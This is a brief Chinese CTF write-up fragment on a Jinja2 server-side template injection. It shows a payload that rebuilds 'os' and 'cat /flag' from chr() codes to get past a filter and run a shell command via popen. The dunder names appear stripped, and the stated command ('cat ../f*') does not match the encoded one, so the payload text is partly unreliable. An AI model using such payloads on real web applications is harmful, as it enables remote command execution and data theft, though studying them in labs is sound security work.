{{().class.bases[0].subclasses()[0].init.globals.builtins.chr}}
爆破结果意味着subclasses()[80]中含有chr的类索引
即可以使用chr()接下来把这一串{%set+chr=[].class.bases[0].subclasses()[80]. init.globals.builtins.chr%}放到前面
原始payload是{{ config.class.init.globals[‘os’].popen (‘cat /flag’).read() }},
接下来要用chr()进行替换,对照ascii表 ‘os’替换成chr(111)%2bchr(115)
‘cat ../f*’替换成chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2b chr(102)%2bchr(108)%2bchr(97)%2bchr(103)
最后
?name={%set+chr=[].class.bases[0].subclasses()[80].init. globals.builtins.chr%}{{ config.class.init.globals [chr(111)%2bchr(115)].popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2b
chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read() }}